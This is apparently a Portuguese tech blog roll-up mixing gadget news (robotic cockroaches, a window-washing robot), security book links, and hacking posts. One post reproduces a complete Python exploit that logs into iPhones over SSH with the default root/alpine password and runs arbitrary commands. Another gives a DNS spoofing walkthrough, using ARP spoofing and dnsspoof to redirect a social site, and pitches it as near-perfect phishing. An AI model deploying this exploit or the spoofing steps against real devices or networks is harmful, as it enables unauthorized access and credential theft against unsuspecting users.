A Microsoft liberou uma arte bem bacana que explica a evolução do profissional de infraestrutura. É claro que a empresa montando pelo tio BILL não mencionou o Linux.
A imagem é comprida:
Para quem não sabe, o metaploitable é uma máquina virtual preparada para você estudar técnicas de invasão.
Este tutorial explica, e muito bem, como explorar algumas de suas vulnerabilidades.
Este carinha é bem interessante porque demonstra todo o processo de instalação e de exploração de vulnerabildiades. Ótimo para aqueles que estão começando..

As baratas robóticas Goki-Raji só poderiam ter sido inventadas no Japão. Elas são controladas pelo iPhone ou pelo iPad com a ajuda de um pequeno acessório. Se você está procurando alguma utilidade prática, saiba que ela não existe, além dos potenciais sustos nas suas amigas que odeiam baratas mais do que tudo no planeta.
Saiba mais sobre as baratas japonesas na Japan Trend Shop.
Se ao invés de baratas o seu negócio for centopéias, sem problemas, confira estas aqui, feitas pela mesma empresa lá no Blog de Brinquedo!
Via Akihabara News.
Clique abaixo para ver um vídeo das baratas robóticas em ação.
Fonte:DigitalDrops

Quando o mundo estiver dominado pelos robôs, no futuro distante, os poucos sobreviventes não vão lembrar que o apocalipse começou com máquinas simples como este novo e utilíssimo robô inteligente que lava janelas!
O Window Washing Robot é o primeiro robô do mundo capaz de limpar automaticamente vidros de qualquer espessura usando uma poderosa bomba de vácuo para prendê-lo no vidro e dois motores que movimentam as esteiras antiderrapantes. O robô calcula automaticamente o tamanho do vidro e a rota mais eficiente para limpá-lo (por isso é “inteligente”). Perfeito para quem mora em andares altos!
O Window Washing Robot custa US$399,99 na pré-venda da Sharper Image
Fonte:DigitalDrops
Os dispositivos iOS permitem executar código remoto mediante ssh, D35m0nd142 fez um exploit demostrando esta ação.
Compartilho o link do 1137day e o código.
http://1337day.com/exploits/14805
#!/usr/bin/python
# When you've launched the command look the terminal
# This software work without Metasploit
# Exploit Title: [GUI]Apple iPhone iOS Default SSH Remote Command Execution exploit
# Exploit Author: D35m0nd142
# Vendor Homepage: http://www.apple.com
# Tested on: Ubuntu 12.04 - Backtrack 5 R3 - Windows 7 Home Premium
import paramiko
import Tkinter
from tkMessageBox import *
import sys
import os
print "******************************************************************"
print "*Apple iPhone iOS Default SSH Remote Command Execution exploit *"
print "* Created by D35m0nd142 *"
print "******************************************************************\n"
root=Tkinter.Tk()
root.geometry("%dx%d" % (490,220))
def exploit():
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ip_iphone=ip.get()
ssh.connect(ip_iphone,username='root',password='alpine')
cmd=command.get()
stdin, stdout, stderr = ssh.exec_command(cmd)
print stdout.readlines()
ok=Tkinter.Label(text="Command executed",bg="blue",fg="yellow").pack()
ssh.close()
root['bg']="black"
root.title("Apple iOS Default SSH Remote Command Execution exploit")
message=showwarning("Warning","D35m0nd142 isn't responsable for your use of this software")
developer=Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom')
ip_label=Tkinter.Label(text="iPhone IP: ").pack()
ip=Tkinter.StringVar()
ip_entry=Tkinter.Entry(textvariable=ip).pack()
command_label=Tkinter.Label(text="Command to execute: ").pack()
command=Tkinter.StringVar()
command_entry=Tkinter.Entry(textvariable=command).pack()
launch_exploit=Tkinter.Button(text="Exploit",command=exploit).pack()
root.mainloop()
HAcking Exposed já virou sinônimo de livros sobre segurança e qualidade. A editora responsável se preocupa em muito no mantenimento de suas edições sempre atualizadas e escritas por profissionais de peso, com bagagem técnica.
Este livro, o qual poderá ser consultado a partir do seguinte link, é recomendado para aqueles que desejam aprender um pouco mais sobre segurança da informação.

Fonte:CorujaTI
Hoje queremos ensinar o método DNS Spoofing como uma vítima sendo enganado, a fim de conseguir encaminhá-lo para um endereço IP que nos interessa. Por que pode ser interessante? fácil:
Scenario
Realizada pela primeira vez ataque MITM à vítima através de ARP Spoofing. Uma vez que o tráfego flui através do atacante, construímos um arquivo hosts a serem passados para dnsspoof. Este arquivo especifica os endereços IP acordes para os nomes de domínio que você deseja spoof. O trecho a seguir simula o arquivo de texto editado:
192.168.0.57 *.tuenti.com
192.168.0.57 tuenti.com
Depois de ter criado o arquivo que você deve executar a ferramenta com a seguinte sintaxe dnsspoof
dnsspoof –i eth0 –f <fichero de hosts>.
Desta maneira simples você pode fazer um phishing quase perfeito, considerando que o site é um clone do original. Por outro lado, a vítima pode detectar este caso para verificar o status do seu cache considera que a resolução de nomes de domínio para Tuenti ter ficado em um endereço IP local, que surpresa e tanto para o usuário final.

Finalmente, indicam que a técnica é bastante simples e interessante. Tenha cuidado com suas máquinas de LAN como realizar este tipo de ataque é muito simples.
![]()
O Wowebook é foda. Ele sempre libera bons livros para galera que gosta de estudar da forma auto ditada. Essa semana o site liberou uma excelente coletânea focada em segurança. Mas agora falaremos de um livro focado em Web Apps
HACKING WEB APPS é um livro que precisa ser lido por todos aqueles que pensam em mexer com segurança focada para aplicações Web. Ele trás uma série de exemplos e explicações que serão a sua base de conhecimento.

Veja os temas abordados em seus capítulos:
Vejam que praticamente cada capítulo é um tipo de ataque. O livro poderá ser consultado a partir do seguinte link.
Boa leitura.
Fonte:CorujadeTI